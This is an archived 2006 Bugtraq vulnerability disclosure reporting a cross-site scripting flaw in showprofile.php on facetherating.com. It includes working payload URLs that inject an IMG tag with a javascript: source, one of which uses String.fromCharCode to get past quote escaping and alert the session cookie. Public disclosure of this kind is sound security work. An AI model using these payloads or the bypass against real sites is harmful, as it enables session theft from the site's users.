[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Facetherating.com - XSS & session disclosure
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Facetherating.com - XSS & session disclosure
- From: luny@xxxxxxxxxxxxxxx
- Date: 13 Jun 2006 09:18:35 -0000
Facetherating.com
Homepage:
http://www.facetherating.com
Affected files:
showprofile.php
XSS vuln via showprofile.php:
The site does the typical filtering of adding backslashes to ' and " so We'll
try something different this time and use a fromCharCode.
http://www.facetherating.com/showprofile.php?username=mustang_chick<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
Now to show our cookie:
http://www.facetherating.com/showprofile.php?username=mustang_chick<IMG%20SRC=javascript:alert(document.cookie)>
Screenshots:
http://www.youfucktard.com/xsp/facerate1.jpg
http://www.youfucktard.com/xsp/facerate2.jpg
Unfortunately, my profile wasn't approved (lol) so I can't test anymore
sections of the siteright now.